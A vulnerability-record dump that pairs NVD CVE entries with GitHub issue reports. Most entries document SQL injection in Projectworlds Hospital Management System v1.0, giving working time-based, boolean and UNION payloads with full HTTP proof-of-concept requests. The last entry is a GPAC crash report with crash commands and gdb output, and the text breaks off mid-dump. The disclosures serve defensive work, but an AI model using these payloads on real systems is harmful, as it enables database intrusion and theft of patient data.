# Author KhanhCM (@khanhchauminh) ## Version: 1.0 ### No login is required # Steps to reproduce 1. Go to **Staff Login** page 2. Input `username`, `password` and choose `Admin` in the **User Type** 2. Click on the **Login** button. 3. Intercept the request and insert the payload in the value of the `email` parameter. Example payload: ``` ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a ``` # Proof-of-concept ``` POST /hms-staff.php HTTP/1.1 Host: 127.0.0.1:8888 Content-Length: 120 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/hms-staff.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ghpdj0nh826f31malqm7j3dko7 Connection: close email=admin@example.com'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&password=password&type=admin ``` # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/140685199-78c99e54-af7a-4eee-aa21-10413c86cc82.png) # Source code review ## [hms-staff.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/master/hms-staff.php#L22) ![image](https://user-images.githubusercontent.com/48460056/140684778-2ea3414d-1ded-4c03-8808-b3ca38d9ebb4.png) ## [library.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/378c15707133316bed3c09d4280f0148cbe89c6e/library.php#L29) ![image](https://user-images.githubusercontent.com/48460056/140684968-e279495c-c12a-4207-81cb-7682850b4aa2.png) # Remediation Validate input of `email` parameter in `hms-staff.php`.
SQL Injection vulnerability via the "email" parameter in hms-staff.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/2/comments
0
2021-11-08T04:40:11Z
2021-11-08T08:28:41Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2
1,047,012,711
2
2,905
CVE-2021-43629
2021-12-22T18:15:07.770
Projectworlds Hospital Management System v1.0 is vulnerable to SQL injection via multiple parameters in admin_home.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 ## Vulnerable parameters ### Staff Registration: * afullname * aemail * apassword ### Doctor Registration: * dfullname * demail * dpassword * dSpecialist ### Delete Clerks: * ClDelEmail ### Delete Doctor: * DrDelEmail # Steps to reproduce 1. Go to **Staff Login** page 2. Login with **User Type = Admin** 3. Input personal information in the form 4. Click on the **Register** button 3. Intercept the request and insert the payload in the value of parameters. Example payload: ``` ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a ``` # Proof-of-concept ``` POST /admin_home.php HTTP/1.1 Host: 127.0.0.1:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/admin_home.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jb2naa6oef92cak3bcohm1dus1 Connection: close afullname=staff1'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&aemail=staff1%40example.com&apassword=password ``` # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/140720928-e523c8fa-da9f-40a5-8e55-3e0402014a61.png) # Source code review ## [admin_home.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/master/admin_home.php#L26) ![image](https://user-images.githubusercontent.com/48460056/140720202-41b9b6a1-999c-4121-8a37-44a22e80f1d5.png) ## library.php * [Register function](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/378c15707133316bed3c09d4280f0148cbe89c6e/library.php#L70) ![image](https://user-images.githubusercontent.com/48460056/140720450-ce6e4ca4-d8c9-499f-b6f9-56bdf2a8ba9e.png) * [Delete function](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/378c15707133316bed3c09d4280f0148cbe89c6e/library.php#L307) ![image](https://user-images.githubusercontent.com/48460056/140720676-69551db2-ecb3-4bff-a02b-4c177bd0e09c.png) # Remediation Validate input of all vulnerable parameters in `admin_home.php`.
SQL Injection vulnerability via multiple parameters in admin_home.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/3/comments
0
2021-11-08T09:53:16Z
2021-11-08T09:53:16Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3
1,047,236,126
3
2,906
CVE-2021-43630
2021-12-22T18:15:07.813
Projectworlds Hospital Management System v1.0 is vulnerable to SQL injection via multiple parameters in add_patient.php. As a result, an authenticated malicious user can compromise the databases system and in some cases leverage this vulnerability to get remote code execution on the remote web server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 ## Vulnerable parameters * apfullname * apphone_no * apaddress * apSpecialist * apCondition # Steps to reproduce 1. Login to your patient account 2. On the next patient page, enter personal information into the form 3. Click on the **Submit** button 4. Intercept the request and insert the payload in the value of parameters. 5. Forward the request Example payload: ``` ' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a) AND 'a'='a ``` # Proof-of-concept ``` POST /add_patient.php HTTP/1.1 Host: 127.0.0.1:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/add_patient.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fm1clgb18smbtthd68i37dsdrn Connection: close apfullname=test'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)%20AND%20'a'%3d'a&apAge=12&apweight=45&apphone_no=123&apaddress=test&apSpecialist=Audiologist&apCondition=test ``` # Response in Burpsuite ![image](https://user-images.githubusercontent.com/48460056/140747797-be1adc09-3b85-432e-b74e-fb0a433f9c2c.png) # Source code review ## [add_patient.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/master/add_patient.php#L25) ![image](https://user-images.githubusercontent.com/48460056/140748038-b63d1aab-fcc5-4868-9c11-1fef8d18a68b.png) ## [library.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/378c15707133316bed3c09d4280f0148cbe89c6e/library.php#L156) ![image](https://user-images.githubusercontent.com/48460056/140748178-1b9d15a8-3056-437f-b32f-b302a3886256.png) ![image](https://user-images.githubusercontent.com/48460056/140748266-174e33d2-7917-4fde-8262-54dad24bf7d4.png) # Remediation Validate input of all vulnerable parameters in `add_patient.php`.
SQL Injection vulnerability via multiple parameters in add_patient.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/4/comments
0
2021-11-08T13:16:26Z
2021-11-08T13:16:26Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4
1,047,437,984
4
2,907
CVE-2021-43631
2021-12-22T18:15:07.857
Projectworlds Hospital Management System v1.0 is vulnerable to SQL injection via the appointment_no parameter in payment.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://projectworlds.in/free-projects/php-projects/hospital-management-system-in-php/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
# Author KhanhCM (@khanhchauminh) ## Version: 1.0 # Steps to reproduce 1. Go to **Staff Login** page 2. Login with **User Type = Clerk** 3. In the **All Appointments** page, click on a record in the list 4. Intercept the request and insert the payload in the value of the `appointment_no` parameter. 5. Forward the request Example payloads: * Boolean-based ``` (SELECT (CASE WHEN (4898=4898) THEN 62 ELSE (SELECT 2503 UNION SELECT 1057) END)) ``` * Time-based ``` 1 AND (SELECT 1 FROM (SELECT(SLEEP(10)))a) ``` * UNION-based ``` 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,(version()),0),NULL-- - ``` # Proof-of-concept ``` GET /payment.php?appointment_no=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7e,(version()),0),NULL--%20-%20 HTTP/1.1 Host: 127.0.0.1:8888 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/all_appointments.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fm1clgb18smbtthd68i37dsdrn Connection: close ``` # Response in Burpsuite * Time-based ![image](https://user-images.githubusercontent.com/48460056/140754090-a1fdddfc-4939-4117-a147-de946571d63e.png) * UNION-based ![image](https://user-images.githubusercontent.com/48460056/140754335-a9373e22-eff9-461b-aa80-9815dae33e57.png) # Source code review ## [payment.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/master/payment.php#L35) ![image](https://user-images.githubusercontent.com/48460056/140754556-0c14365f-2aa0-47f3-9c47-ead583205c92.png) ## [library.php](https://github.com/projectworldsofficial/hospital-management-system-in-php/blob/378c15707133316bed3c09d4280f0148cbe89c6e/library.php#L233) ![image](https://user-images.githubusercontent.com/48460056/140754895-69192d6d-ea33-4a97-b3d1-2157e6685a70.png) # Remediation Validate input of the `appointment_no` parameter in `payment.php`.
SQL Injection vulnerability via "appointment_no" parameter in payment.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/5/comments
0
2021-11-08T14:00:14Z
2021-11-08T14:00:14Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5
1,047,485,856
5
2,908
CVE-2021-45260
2021-12-22T18:15:08.060
A null pointer dereference vulnerability exists in gpac 1.1.0 in the lsr_read_id.part function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1979" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1979" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1979
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in lsr_read_id.part(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt poc_15 ./MP4Box -bt poc_16 ./MP4Box -bt poc_18 ``` [poc.zip](https://github.com/gpac/gpac/files/7696725/poc.zip) **Result** poc_15 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 852201 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 852201 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samepolyXXX coded in bitstream but no polyXXX defined ! [LASeR] samerect coded in bitstream but no rect defined ! [LASeR] samerect coded in bitstream but no rect defined ! [1] 1501387 segmentation fault ./MP4Box -bt ./poc/poc_15 ``` poc_16 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [1] 2404995 segmentation fault ./MP4Box -bt ./poc/poc_16 ``` poc_18 ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861267 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [1] 1048981 segmentation fault ./MP4Box -bt ./poc/poc_18 ``` **gdb** poc_15 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x770000007c RBX 0x0 RCX 0x5555555e5760 ◂— 0x8b374bf60d8b0d94 RDX 0x0 RDI 0x5555555deda0 —▸ 0x5555555e4e20 —▸ 0x7fffffff69c0 ◂— 0x5b0000006e /* 'n' */ RSI 0x0 R8 0x5555555e5740 —▸ 0x5555555e4730 —▸ 0x5555555e5530 ◂— 0x0 R9 0x5555555e5a10 ◂— 0x2b0 R10 0x5555555c6010 ◂— 0x0 R11 0x7ffff7727be0 (main_arena+96) —▸ 0x5555555e5af0 ◂— 0x3529 /* ')5' */ R12 0x7fffffff69c0 ◂— 0x5b0000006e /* 'n' */ R13 0x3 R14 0xe R15 0x0 RBP 0x5555555dcf10 —▸ 0x5555555d2750 ◂— 0x0 RSP 0x7fffffff68a0 —▸ 0x5555555e56e0 —▸ 0x5555555e5700 ◂— 0x800000030000042b RIP 0x7ffff7b508f8 (lsr_read_id.part+232) ◂— cmp byte ptr [rax], 0x23 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff7b508f8 <lsr_read_id.part+232> cmp byte ptr [rax], 0x23 0x7ffff7b508fb <lsr_read_id.part+235> sete dl 0x7ffff7b508fe <lsr_read_id.part+238> xor esi, esi 0x7ffff7b50900 <lsr_read_id.part+240> lea rdi, [rax + rdx + 1] 0x7ffff7b50905 <lsr_read_id.part+245> mov edx, 0xa 0x7ffff7b5090a <lsr_read_id.part+250> call strtol@plt <strtol@plt> 0x7ffff7b5090f <lsr_read_id.part+255> cmp r14d, eax 0x7ffff7b50912 <lsr_read_id.part+258> je lsr_read_id.part+608 <lsr_read_id.part+608> 0x7ffff7b50918 <lsr_read_id.part+264> add r15d, 1 0x7ffff7b5091c <lsr_read_id.part+268> cmp r15d, r13d 0x7ffff7b5091f <lsr_read_id.part+271> jb lsr_read_id.part+208 <lsr_read_id.part+208> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff68a0 —▸ 0x5555555e56e0 —▸ 0x5555555e5700 ◂— 0x800000030000042b ... ↓ 2 skipped 03:0018│ 0x7fffffff68b8 —▸ 0x7ffff784961e (gf_node_setup+30) ◂— mov qword ptr [rbx], rax 04:0020│ 0x7fffffff68c0 ◂— 0x42b ... ↓ 2 skipped 07:0038│ 0x7fffffff68d8 ◂— 0xaaefd0fae3bbeb00 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff7b508f8 lsr_read_id.part+232 f 1 0x7ffff7b5e4bb lsr_read_rect+139 f 2 0x7ffff7b5a965 lsr_read_scene_content_model+661 f 3 0x7ffff7b5b62c lsr_read_group_content.part+316 f 4 0x7ffff7b5f0fc lsr_read_data+108 f 5 0x7ffff7b5ab3d lsr_read_scene_content_model+1133 f 6 0x7ffff7b5b62c lsr_read_group_content.part+316 f 7 0x7ffff7b5e536 lsr_read_rect+262 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7b5e4bb in lsr_read_rect () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7b5a965 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7b5f0fc in lsr_read_data () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7b5ab3d in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7b5e536 in lsr_read_rect () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7b5a965 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff7b5cea8 in lsr_read_audio.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff7b5ac18 in lsr_read_scene_content_model () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00007ffff7b5b62c in lsr_read_group_content.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #13 0x00007ffff7b60795 in lsr_read_svg () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #14 0x00007ffff7b575c7 in lsr_read_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #15 0x00007ffff7b59914 in lsr_decode_laser_unit () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #16 0x00007ffff7b6204d in gf_laser_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #17 0x00007ffff7aa1eb1 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #18 0x00005555555844a8 in dump_isom_scene () #19 0x000055555557b42c in mp4boxMain () #20 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #21 0x000055555556c45e in _start () ``` poc_16 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b508f8 in lsr_read_id.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x0 RDI 0x5555555de970 —▸ 0x5555555dee00 —▸ 0x5555555dedb0 ◂— 0x0 RSI 0x1 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x5555555dee88 ◂— 0x0 R13 0x2 R14 0x2 R15 0x1 RBP 0x5555555dcc30 —▸ 0x5555555d26d0 ◂— 0x0 RSP 0x7fffffff6d40 